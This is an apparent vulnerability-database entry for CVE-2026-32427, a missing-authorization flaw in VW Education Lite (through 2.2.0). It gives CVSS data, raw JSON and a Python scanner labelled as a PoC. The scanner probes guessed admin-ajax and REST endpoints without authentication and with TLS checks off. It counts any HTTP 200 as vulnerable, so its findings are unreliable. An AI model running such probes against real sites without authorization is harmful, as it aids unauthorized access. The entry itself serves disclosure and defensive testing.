Security Vulnerability Report
中文
CVE-2026-32427 CVSS 5.3 MEDIUM

CVE-2026-32427

Published: 2026-03-13 19:55:01
Last Modified: 2026-04-29 10:17:09

Description

Missing Authorization vulnerability in vowelweb VW Education Lite vw-education-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Education Lite: from n/a through <= 2.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

VW Education Lite ≤ 2.2.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32427 PoC - VW Education Lite Missing Authorization # Target: WordPress site with VW Education Lite plugin <= 2.2.0 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-32427 Missing Authorization in VW Education Lite plugin """ # Common VW Education Lite endpoints that may be unprotected vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=vw_education_get_courses', '/wp-admin/admin-ajax.php?action=vw_education_manage_users', '/wp-content/plugins/vw-education-lite/inc/classes/export-data.php', '/wp-json/vw-education/v1/courses', '/wp-json/vw-education/v1/users' ] results = [] for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if endpoint is accessible without authentication if response.status_code == 200: results.append({ 'endpoint': endpoint, 'status': 'VULNERABLE', 'response_code': response.status_code }) elif response.status_code == 403: results.append({ 'endpoint': endpoint, 'status': 'PROTECTED', 'response_code': response.status_code }) except requests.RequestException as e: results.append({ 'endpoint': endpoint, 'status': 'ERROR', 'error': str(e) }) return results if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2026-32427-poc.py <target_url>') print('Example: python cve-2026-32427-poc.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Scanning {target} for CVE-2026-32427...') print('[*] VW Education Lite <= 2.2.0 Missing Authorization') print('-' * 50) results = check_vulnerability(target) for result in results: print(f"[{result['status']}] {result['endpoint']} - HTTP {result.get('response_code', 'N/A')}") vulnerable_count = sum(1 for r in results if r['status'] == 'VULNERABLE') if vulnerable_count > 0: print(f'\n[!] Found {vulnerable_count} vulnerable endpoint(s)') print('[!] Target is likely vulnerable to CVE-2026-32427') else: print('\n[*] No obvious vulnerabilities detected')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32427", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:01.200", "lastModified": "2026-04-29T10:17:08.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in vowelweb VW Education Lite vw-education-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Education Lite: from n/a through <= 2.2.0."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en vowelweb VW Education Lite vw-education-lite permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a VW Education Lite: desde n/a hasta &lt;= 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/vw-education-lite/vulnerability/wordpress-vw-education-lite-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}